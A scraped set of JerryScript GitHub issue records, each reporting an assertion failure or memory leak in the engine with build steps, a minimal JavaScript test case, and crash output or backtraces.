not assert | Assertion 'property_p == NULL || !(*property_p & ECMA_PROPERTY_FLAG_ENUMERABLE)' in vm_loop | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4149/comments | 1 | 2020-08-17T23:34:29Z | 2020-12-14T10:30:45Z | https://github.com/jerryscript-project/jerryscript/issues/4149 | 680,586,673 | 4,149 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
086d1cc127f12e31ed315b41ca59ec0c3e88c7f4
(latest master - 2020.08.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test cases
test262-esnext tests:
- built-ins/TypedArray/prototype/toLocaleString/return-abrupt-from-firstelement-tostring.js
- built-ins/TypedArray/prototype/toLocaleString/return-abrupt-from-firstelement-valueof.js
- built-ins/TypedArray/prototype/toLocaleString/return-abrupt-from-nextelement-tostring.js
- built-ins/TypedArray/prototype/toLocaleString/return-abrupt-from-nextelement-valueof.js
###### Output
```
ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/oszi/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):107.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
It means a memory leak somewhere in TypedArray.prototype.toLocaleString implementation.
###### Expected behavior
not assert -> not leak | Memory leak in TypedArray.prototype.toLocaleString | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4148/comments | 0 | 2020-08-17T23:29:41Z | 2020-08-24T12:50:19Z | https://github.com/jerryscript-project/jerryscript/issues/4148 | 680,584,930 | 4,148 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
086d1cc127f12e31ed315b41ca59ec0c3e88c7f4
(latest master - 2020.08.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext tests:
- harness/assert-notsamevalue-tostring.js
- harness/assert-samevalue-tostring.js
- harness/assert-tostring.js
minimal testcase
```
var asyncFunProto = Object.getPrototypeOf(async function() {});
Object.prototype.toString.call(asyncFunProto)
```
###### Output
```
ICE: Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):2622.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert | Assertion 'ecma_object_check_class_name_is_object (obj_p)' in ecma_object_get_class_name | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4147/comments | 1 | 2020-08-17T23:12:34Z | 2020-10-07T06:48:12Z | https://github.com/jerryscript-project/jerryscript/issues/4147 | 680,578,560 | 4,147 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
086d1cc127f12e31ed315b41ca59ec0c3e88c7f4
(latest master - 2020.08.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext built-ins/Array/prototype/copyWithin/coerced-values-start-change-target.js
little bit smaller test case (without test harness files)
```
function longDenseArray(){
var a = [0];
for(var i = 0; i < 1024; i++){
a[i] = i;
}
return a;
}
function shorten(){
currArray.length = 20;
return 1;
}
var array = longDenseArray();
array.length = 20;
for(var i = 0; i < 19; i++){
array[i+1000] = array[i+1];
}
var currArray = longDenseArray();
currArray.copyWithin(1000, {valueOf: shorten})
```
###### Output
```
ICE: Assertion 'ecma_get_value_type_field (value) == ECMA_TYPE_DIRECT || ecma_get_value_type_field (value) == ECMA_TYPE_DIRECT_STRING' failed at /home/oszi/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_copy_value):920.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert | Assertion 'ecma_get_value_type_field (value) == ECMA_TYPE_DIRECT in ecma_copy_value | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4146/comments | 0 | 2020-08-17T22:36:07Z | 2020-08-28T08:55:27Z | https://github.com/jerryscript-project/jerryscript/issues/4146 | 680,565,844 | 4,146 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
5ce95be1
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16 \
```
###### Test case
```javascript
var b;
0n == b;
```
###### Output
```text
ICE: Assertion 'ecma_is_value_object (x)' failed at jerryscript/jerry-core/ecma/operations/ecma-comparison.c(ecma_op_abstract_equality_compare):209.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3223079==ERROR: AddressSanitizer: ABRT on unknown address 0x00312e27 (pc 0xf7ed4b49 bp 0xff81810c sp 0xff8180f0 T0)
#0 0xf7ed4b48 (linux-gate.so.1+0xb48)
#1 0xf76c74c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf76af3f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x56796491 in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x566b8d32 in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x566b8d73 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x5667beda in ecma_op_abstract_equality_compare jerryscript/jerry-core/ecma/operations/ecma-comparison.c:209
#7 0x566efba7 in opfunc_equality jerryscript/jerry-core/vm/opcodes-ecma-relational-equality.c:47
#8 0x56707e24 in vm_loop jerryscript/jerry-core/vm/vm.c:3284
#9 0x56710e51 in vm_execute jerryscript/jerry-core/vm/vm.c:4693
#10 0x5671145c in vm_run jerryscript/jerry-core/vm/vm.c:4801
#11 0x566f7b30 in vm_run_global jerryscript/jerry-core/vm/vm.c:340
#12 0x5662d8a5 in jerry_run jerryscript/jerry-core/api/jerry.c:589
#13 0x566272c4 in main jerryscript/jerry-main/main-unix.c:123
#14 0xf76b0ee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#15 0x56626a44 in _start (jerryscript/build/bin/jerry+0x1aa44)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==3223079==ABORTING
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion ecma_is_value_object (x) in ecma_op_abstract_equality_compare | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4139/comments | 0 | 2020-08-13T06:28:46Z | 2020-08-18T11:50:58Z | https://github.com/jerryscript-project/jerryscript/issues/4139 | 678,188,350 | 4,139 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
5ce95be1
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16 \
```
###### Test case
```javascript
new Object(0n);
```
###### Output
```text
ICE: Assertion 'ecma_is_value_undefined (value) || ecma_is_value_null (value)' failed at jerryscript/jerry-core/ecma/operations/ecma-objects-general.c(ecma_op_create_object_object_arg):94.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2260432==ERROR: AddressSanitizer: ABRT on unknown address 0x00227dd0 (pc 0xf7f36b49 bp 0xffbaec0c sp 0xffbaebf0 T0)
#0 0xf7f36b48 (linux-gate.so.1+0xb48)
#1 0xf77294c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf77113f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x56708491 in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x5662ad32 in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x5662ad73 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x566030ef in ecma_op_create_object_object_arg jerryscript/jerry-core/ecma/operations/ecma-objects-general.c:93
#7 0x566af636 in ecma_builtin_object_dispatch_construct jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-object.c:136
#8 0x565d7ff4 in ecma_builtin_dispatch_construct jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1246
#9 0x565fb1e7 in ecma_op_function_construct jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1287
#10 0x5666b881 in opfunc_construct jerryscript/jerry-core/vm/vm.c:864
#11 0x56682ef3 in vm_execute jerryscript/jerry-core/vm/vm.c:4720
#12 0x5668345c in vm_run jerryscript/jerry-core/vm/vm.c:4801
#13 0x56669b30 in vm_run_global jerryscript/jerry-core/vm/vm.c:340
#14 0x5659f8a5 in jerry_run jerryscript/jerry-core/api/jerry.c:589
#15 0x565992c4 in main jerryscript/jerry-main/main-unix.c:123
#16 0xf7712ee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#17 0x56598a44 in _start (jerryscript/build/bin/jerry+0x1aa44)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==2260432==ABORTING
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion ecma_is_value_undefined (value) || ecma_is_value_null (value) in ecma_op_create_object_object_arg | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4138/comments | 0 | 2020-08-13T06:26:40Z | 2020-08-27T07:04:47Z | https://github.com/jerryscript-project/jerryscript/issues/4138 | 678,187,424 | 4,138 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
0c154306a87492f255edae6f483a768f128c2c09
(latest master - 2020.08.11.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
found by test262-esnext language/module-code/top-level-await/... tests
minimized test case
```
function fn() { return function() {}; }
export class C extends fn(await []) {};
```
###### Output
```
ICE: Assertion 'CBC_FUNCTION_GET_TYPE (frame_ctx_p->bytecode_header_p->status_flags) == CBC_FUNCTION_ASYNC || CBC_FUNCTION_GET_TYPE (frame_ctx_p->bytecode_header_p->status_flags) == CBC_FUNCTION_ASYNC_ARROW' failed at /home/oszi/jerryscript/jerry-core/vm/opcodes.c(opfunc_async_create_and_await):914.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
###### Expected behavior
not assert, but SyntaxError, because top-level-await isn't supported yet | Assertion CBC_FUNCTION_GET_TYPE (frame_ctx_p->bytecode_header_p->status_flags) == CBC_FUNCTION_ASYNC in opfunc_async_create_and_await | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4135/comments | 3 | 2020-08-12T14:36:13Z | 2020-12-11T12:56:37Z | https://github.com/jerryscript-project/jerryscript/issues/4135 | 677,744,119 | 4,135 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
0c154306
###### Build platform
Linux-5.4.0-42-generic-x86_64-with-glibc2.29
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --profile=es2015-subset \
--builddir=build --stack-limit=16
```
###### Test case
```javascript
(async(0,)
```
###### Output
```text
ICE: Assertion 'context_p->stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p->stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_statement_end):2147.
Error: ERR_FAILED_INTERNAL_ASSERTION
AddressSanitizer:DEADLYSIGNAL
=================================================================
==143180==ERROR: AddressSanitizer: ABRT on unknown address 0x00022f4c (pc 0xf7f0bb49 bp 0xfff9e4cc sp 0xfff9e4b0 T0)
#0 0xf7f0bb48 (linux-gate.so.1+0xb48)
#1 0xf76fe4c5 in raise (/lib/i386-linux-gnu/libc.so.6+0x354c5)
#2 0xf76e63f6 in abort (/lib/i386-linux-gnu/libc.so.6+0x1d3f6)
#3 0x567c0f4b in jerry_port_fatal jerryscript/jerry-port/default/default-fatal.c:30
#4 0x566e4381 in jerry_fatal jerryscript/jerry-core/jrt/jrt-fatals.c:63
#5 0x566e43c2 in jerry_assert_fail jerryscript/jerry-core/jrt/jrt-fatals.c:87
#6 0x5670c1f0 in scanner_scan_statement_end jerryscript/jerry-core/parser/js/js-scanner.c:2146
#7 0x5670e24a in scanner_scan_all jerryscript/jerry-core/parser/js/js-scanner.c:2578
#8 0x566f2e61 in parser_parse_source jerryscript/jerry-core/parser/js/js-parser.c:2209
#9 0x566f7717 in parser_parse_script jerryscript/jerry-core/parser/js/js-parser.c:2938
#10 0x566594c7 in jerry_parse jerryscript/jerry-core/api/jerry.c:451
#11 0x566530f1 in main jerryscript/jerry-main/main-unix.c:112
#12 0xf76e7ee4 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1eee4)
#13 0x566529b4 in _start (jerryscript/build/bin/jerry+0x1a9b4)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: ABRT (linux-gate.so.1+0xb48)
==143180==ABORTING
```
<sup>Found by [Fuzzinator](http://fuzzinator.readthedocs.io/) with [grammarinator](https://github.com/renatahodovan/grammarinator).</sup> | Assertion context_p->stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p->stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT in scanner_scan_statement_end | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4132/comments | 1 | 2020-08-12T12:49:59Z | 2020-11-19T10:27:30Z | https://github.com/jerryscript-project/jerryscript/issues/4132 | 677,668,122 | 4,132 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
0c154306a87492f255edae6f483a768f128c2c09
(latest master - 2020.08.11.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
official test262-esnext test cases:
- built-ins/Promise/reject/capability-invocation-error.js
- built-ins/Promise/resolve/capability-invocation-error.js
minimized test case from built-ins/Promise/reject/capability-invocation-error.js
```
var P = function(executor) {
return new Promise(function() {
executor(
function() {},
function() {
throw "error";
}
);
});
};
Promise.reject.call(P);
```
minimized test case from built-ins/Promise/resolve/capability-invocation-error.js
```
var P = function(executor) {
return new Promise(function() {
executor(
function() {
throw "error";
},
function() {}
);
});
};
Promise.resolve.call(P);
```
###### Output
```
error
ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/oszi/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
###### Details
"executor" string is leaked, it has 2 references at the end. | Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' in ecma_free_string_list | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4131/comments | 0 | 2020-08-12T12:25:42Z | 2020-08-17T09:06:45Z | https://github.com/jerryscript-project/jerryscript/issues/4131 | 677,652,310 | 4,131 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
0c154306a87492f255edae6f483a768f128c2c09
(latest master - 2020.08.11.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
official test262-esnext test cases:
- built-ins/JSON/parse/reviver-array-define-prop-err.js
- built-ins/JSON/parse/reviver-array-delete-err.js
- built-ins/JSON/parse/reviver-object-define-prop-err.js
minimized test case from reviver-array-delete-err.js:
```
var badDelete = new Proxy([0], {
deleteProperty: function() {
throw "error";
}
});
// should throw exceotion, but asserts
JSON.parse('[0,0]', function() { this[1] = badDelete; });
```
minimized test case from reviver-array-define-prop-err.js
```
var badDefine = new Proxy([null], {
defineProperty: function(_, name) {
throw "error";
}
});
JSON.parse('["first", null]', function(_, value) {
if (value === 'first') {
this[1] = badDefine;
}
return value;
});
```
minimized test case from reviver-object-define-prop-err.js
```
var badDefine = new Proxy({
0: null
}, {
defineProperty: function() {
throw "error";
}
});
JSON.parse('["first", null]', function(_, value) {
if (value === 'first') {
this[1] = badDefine;
}
return value;
});
```
###### Output
reviver-array-delete-err.js:
```
ICE: Assertion 'ecma_is_value_boolean (delete_val)' failed at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c(ecma_builtin_json_internalize_property):682.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
reviver-array-define-prop-err.js and reviver-object-define-prop-err.js:
```
ICE: Assertion 'ecma_is_value_boolean (completion_value)' failed at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c(ecma_builtin_json_define_value_property):447.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
###### Backtrace
reviver-array-delete-err.js:
```
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff7a248b1 in __GI_abort () at abort.c:79
#2 0x000055555555f5e4 in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-port/default/default-fatal.c:30
#3 0x00005555555af128 in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:63
#4 0x00005555555af17a in jerry_assert_fail (assertion=0x55555562b430 "ecma_is_value_boolean (delete_val)", file=0x55555562b380 "/home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c", function=0x555555607f20 <__func__.6749.lto_priv.206> "ecma_builtin_json_internalize_property", line=682) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:87
#5 0x00005555555ee1bd in ecma_builtin_json_internalize_property (reviver_p=0x5555558444d8 <jerry_global_heap+560>, holder_p=0x5555558444e8 <jerry_global_heap+576>, name_p=0x35) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:682
#6 0x00005555555ee12e in ecma_builtin_json_internalize_property (reviver_p=0x5555558444d8 <jerry_global_heap+560>, holder_p=0x5555558444f8 <jerry_global_heap+592>, name_p=0xd) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#7 0x00005555555ee5af in ecma_builtin_json_parse (this_arg=475, arg1=537, arg2=563) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:829
#8 0x00005555555ed36a in ecma_builtin_json_dispatch_routine (builtin_routine_id=90, this_arg_value=475, arguments_list=0x7fffffffddd4, arguments_number=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.inc.h:33
#9 0x00005555555f188c in ecma_builtin_dispatch_routine (func_obj_p=0x5555558444a0 <jerry_global_heap+504>, this_arg_value=475, arguments_list_p=0x7fffffffddd4, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#10 0x00005555555f19c3 in ecma_builtin_dispatch_call (obj_p=0x5555558444a0 <jerry_global_heap+504>, this_arg_value=475, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#11 0x00005555555deb90 in ecma_op_function_call_simple (func_obj_p=0x5555558444a0 <jerry_global_heap+504>, this_arg_value=475, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:846
#12 0x00005555555df2fa in ecma_op_function_call (func_obj_p=0x5555558444a0 <jerry_global_heap+504>, this_arg_value=475, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1143
#13 0x00005555555a4183 in opfunc_call.lto_priv.496 (frame_ctx_p=0x7fffffffdfd0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:779
#14 0x000055555558bc3d in vm_execute (frame_ctx_p=0x7fffffffdfd0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4699
#15 0x000055555558be7e in vm_run (bytecode_header_p=0x5555558445c8 <jerry_global_heap+800>, this_binding_value=27, lex_env_p=0x5555558442d8 <jerry_global_heap+48>, arg_list_p=0x0, arg_list_len=0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4801
#16 0x00005555555a37f4 in vm_run_global (bytecode_p=0x5555558445c8 <jerry_global_heap+800>) at /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#17 0x00005555555f8749 in jerry_run (func_val=291) at /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#18 0x00005555555f5cd5 in main (argc=2, argv=0x7fffffffe478) at /home/oszi/jerryscript/jerry-main/main-unix.c:123
```
reviver-array-define-prop-err.js and reviver-object-define-prop-err.js:
```
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff7a248b1 in __GI_abort () at abort.c:79
#2 0x000055555555f5e4 in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-port/default/default-fatal.c:30
#3 0x00005555555af128 in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:63
#4 0x00005555555af17a in jerry_assert_fail (assertion=0x55555562b3d0 "ecma_is_value_boolean (completion_value)", file=0x55555562b380 "/home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c", function=0x555555607ec0 <__func__.6719.lto_priv.889> "ecma_builtin_json_define_value_property", line=447) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:87
#5 0x00005555555edbac in ecma_builtin_json_define_value_property (obj_p=0x555555844478 <jerry_global_heap+464>, property_name_p=0x15, value=88) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:447
#6 0x00005555555ee1d3 in ecma_builtin_json_internalize_property (reviver_p=0x5555558444e0 <jerry_global_heap+568>, holder_p=0x5555558444f0 <jerry_global_heap+584>, name_p=0x35) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:686
#7 0x00005555555ee12e in ecma_builtin_json_internalize_property (reviver_p=0x5555558444e0 <jerry_global_heap+568>, holder_p=0x555555844548 <jerry_global_heap+672>, name_p=0xd) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:670
#8 0x00005555555ee5af in ecma_builtin_json_parse (this_arg=483, arg1=545, arg2=571) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:829
#9 0x00005555555ed36a in ecma_builtin_json_dispatch_routine (builtin_routine_id=90, this_arg_value=483, arguments_list=0x7fffffffddd4, arguments_number=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.inc.h:33
#10 0x00005555555f188c in ecma_builtin_dispatch_routine (func_obj_p=0x5555558444a8 <jerry_global_heap+512>, this_arg_value=483, arguments_list_p=0x7fffffffddd4, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#11 0x00005555555f19c3 in ecma_builtin_dispatch_call (obj_p=0x5555558444a8 <jerry_global_heap+512>, this_arg_value=483, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#12 0x00005555555deb90 in ecma_op_function_call_simple (func_obj_p=0x5555558444a8 <jerry_global_heap+512>, this_arg_value=483, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:846
#13 0x00005555555df2fa in ecma_op_function_call (func_obj_p=0x5555558444a8 <jerry_global_heap+512>, this_arg_value=483, arguments_list_p=0x7fffffffe024, arguments_list_len=2) at /home/oszi/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1143
#14 0x00005555555a4183 in opfunc_call.lto_priv.496 (frame_ctx_p=0x7fffffffdfd0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:779
#15 0x000055555558bc3d in vm_execute (frame_ctx_p=0x7fffffffdfd0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4699
#16 0x000055555558be7e in vm_run (bytecode_header_p=0x555555844600 <jerry_global_heap+856>, this_binding_value=27, lex_env_p=0x5555558442d8 <jerry_global_heap+48>, arg_list_p=0x0, arg_list_len=0) at /home/oszi/jerryscript/jerry-core/vm/vm.c:4801
#17 0x00005555555a37f4 in vm_run_global (bytecode_p=0x555555844600 <jerry_global_heap+856>) at /home/oszi/jerryscript/jerry-core/vm/vm.c:340
#18 0x00005555555f8749 in jerry_run (func_val=299) at /home/oszi/jerryscript/jerry-core/api/jerry.c:589
#19 0x00005555555f5cd5 in main (argc=2, argv=0x7fffffffe478) at /home/oszi/jerryscript/jerry-main/main-unix.c:123
``` | Assertion 'ecma_is_value_boolean (delete_val/completion_value)' in ecma_builtin_json_internalize_property | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4130/comments | 0 | 2020-08-12T11:26:12Z | 2020-08-14T06:25:44Z | https://github.com/jerryscript-project/jerryscript/issues/4130 | 677,612,219 | 4,130 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
0c154306a87492f255edae6f483a768f128c2c09
(latest master - 2020.08.11.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test case
official test262-esnext test case: built-ins/JSON/stringify/value-string-escape-unicode.js
echo "'use strict';" >test.js
cat tests/test262/esnext/harness/sta.js tests/test262/esnext/harness/assert.js tests/test262/esnext/test/built-ins/JSON/stringify/value-string-escape-unicode.js >>test.js
$build/bin/jerry test.js
Note: This test fails only on debug build and only in strict mode. After changing the test, eg commenting sub-cases, the assert goes away.
###### Output
```
ICE: Assertion '(c & LIT_UTF8_3_BYTE_MASK) == LIT_UTF8_3_BYTE_MARKER' failed at /home/oszi/jerryscript/jerry-core/lit/lit-strings.c(lit_read_code_unit_from_utf8):447.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Backtrace
```
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff7a248b1 in __GI_abort () at abort.c:79
#2 0x000055555555f5e4 in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-port/default/default-fatal.c:30
#3 0x00005555555af128 in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:63
#4 0x00005555555af17a in jerry_assert_fail (assertion=0x555555622058 "(c & LIT_UTF8_3_BYTE_MASK) == LIT_UTF8_3_BYTE_MARKER", file=0x555555621f80 "/home/oszi/jerryscript/jerry-core/lit/lit-strings.c", function=0x55555560d570 <__func__.2773.lto_priv.581> "lit_read_code_unit_from_utf8", line=447) at /home/oszi/jerryscript/jerry-core/jrt/jrt-fatals.c:87
#5 0x00005555555b1826 in lit_read_code_unit_from_utf8 (buf_p=0x55555584514a <jerry_global_heap+3746> "\206\355\240\264\355\274\250\001\024\002*\002-\002`\017", code_point=0x7fffffffdb4e) at /home/oszi/jerryscript/jerry-core/lit/lit-strings.c:447
#6 0x00005555555b1a31 in lit_cesu8_peek_next (buf_p=0x55555584514a <jerry_global_heap+3746> "\206\355\240\264\355\274\250\001\024\002*\002-\002`\017") at /home/oszi/jerryscript/jerry-core/lit/lit-strings.c:522
#7 0x00005555555ee666 in ecma_builtin_json_quote (builder_p=0x7fffffffdd18, string_p=0x555555845138 <jerry_global_heap+3728>) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:861
#8 0x00005555555ef2c2 in ecma_builtin_json_serialize_property (context_p=0x7fffffffdcf0, holder_p=0x555555844998 <jerry_global_heap+1776>, key_p=0xd) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1326
#9 0x00005555555ef566 in ecma_builtin_json_str_helper (context_p=0x7fffffffdcf0, arg1=3729) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1419
#10 0x00005555555efd1a in ecma_builtin_json_stringify (this_arg=1259, arg1=3729, arg2=72, arg3=72) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1694
#11 0x00005555555ed390 in ecma_builtin_json_dispatch_routine (builtin_routine_id=91, this_arg_value=1259, arguments_list=0x7fffffffde24, arguments_number=1) at /home/oszi/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.inc.h:34
